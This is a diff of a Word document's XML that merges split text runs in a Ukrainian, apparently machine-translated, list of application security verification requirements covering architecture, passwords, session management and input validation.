+        <w:t>Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. Рівень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методів, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7407,29 +6162,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Арх</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ітектура, проектування та моделювання загроз</w:t>
+        <w:t>1. Архітектура, проектування та моделювання загроз</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8424,29 +7157,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>арх</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ітектура високого рівня для </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що архітектура високого рівня для </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8657,51 +7368,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>тому</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, що всі компоненти програми визначаються з точки зору бізнес-функцій і / або функцій безпеки, які вони забезпечують.</w:t>
+              <w:t>Переконайтеся в тому, що всі компоненти програми визначаються з точки зору бізнес-функцій і / або функцій безпеки, які вони забезпечують.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9526,29 +8193,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що компоненти відокремлені один від одного за допомогою певного контролю безпеки, такі як мережевий сегментації, правила брандмауера або групи безпеки </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>на</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> основі хмарних обчислень.</w:t>
+              <w:t>Переконайтеся, що компоненти відокремлені один від одного за допомогою певного контролю безпеки, такі як мережевий сегментації, правила брандмауера або групи безпеки на основі хмарних обчислень.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9745,29 +8390,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що програма має чіткий поділ між шаром даних, контролером шаром і </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>шаром</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> дисплея, таким чином, що рішення безпеки може </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що програма має чіткий поділ між шаром даних, контролером шаром і шаром дисплея, таким чином, що рішення безпеки може </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11191,29 +9814,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> означа</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>є,</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> що облікові дані зберігаютьс</w:t>
+              <w:t xml:space="preserve"> означає, що облікові дані зберігаютьс</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11727,29 +10328,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">пароля включає в себе старий пароль, новий пароль і </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>п</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ідтвердження пароля.</w:t>
+              <w:t>пароля включає в себе старий пароль, новий пароль і підтвердження пароля.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11987,29 +10566,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> в себе запити з відповідними метаданими, необхідними для </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>досл</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>іджень безпеки.</w:t>
+              <w:t xml:space="preserve"> в себе запити з відповідними метаданими, необхідними для досліджень безпеки.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12206,29 +10763,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, немає паролів за замовчуванням у використанні для середовища розробки програми або </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>будь-як</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>і компоне</w:t>
+              <w:t>Переконайтеся, немає паролів за замовчуванням у використанні для середовища розробки програми або будь-які компоне</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13148,29 +11683,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
+              <w:t>Переконайтеся в тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13367,29 +11880,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> тому, що вживаються заходи, щоб заблокувати використання </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що вживаються заходи, щоб заблокувати використання </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15261,29 +13752,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що немає користувальницьких менеджер сеансів, або що диспетчер сеансу </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ст</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ійкий проти всіх атак управління загального сеансу.</w:t>
+              <w:t>Переконайтеся в тому, що немає користувальницьких менеджер сеансів, або що диспетчер сеансу стійкий проти всіх атак управління загального сеансу.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15466,29 +13935,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
+              <w:t>Переконайтеся в тому, що сеанси анулюються, коли користувач виходить з системи.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15705,29 +14152,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>п</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ісля певного періоду бездіяльності.</w:t>
+              <w:t xml:space="preserve"> після певного періоду бездіяльності.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15944,29 +14369,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>п</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ісля того, як</w:t>
+              <w:t xml:space="preserve"> після того, як</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16461,29 +14864,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">, повідомлень про помилки або журналах. Це </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>включає в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> себе перевірку того, що програма не вміє обробляти </w:t>
+              <w:t xml:space="preserve">, повідомлень про помилки або журналах. Це включає в себе перевірку того, що програма не вміє обробляти </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16889,7 +15270,6 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16970,7 +15350,6 @@
               </w:rPr>
               <w:t>додатком.</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -17751,51 +16130,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>тому</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, що </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18102,29 +16437,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>до</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> відхилення запиту та</w:t>
+              <w:t xml:space="preserve"> до відхилення запиту та</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18341,29 +16654,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що вхідні перевірка </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>п</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ідпрограми </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що вхідні перевірка підпрограми </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18584,29 +16875,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>кожного</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> типу да</w:t>
+              <w:t>Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для кожного типу да</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -19116,51 +17385,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>тому</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, що програма не сприйнятливий до </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що програма не сприйнятливий до </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -20370,7 +18595,6 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
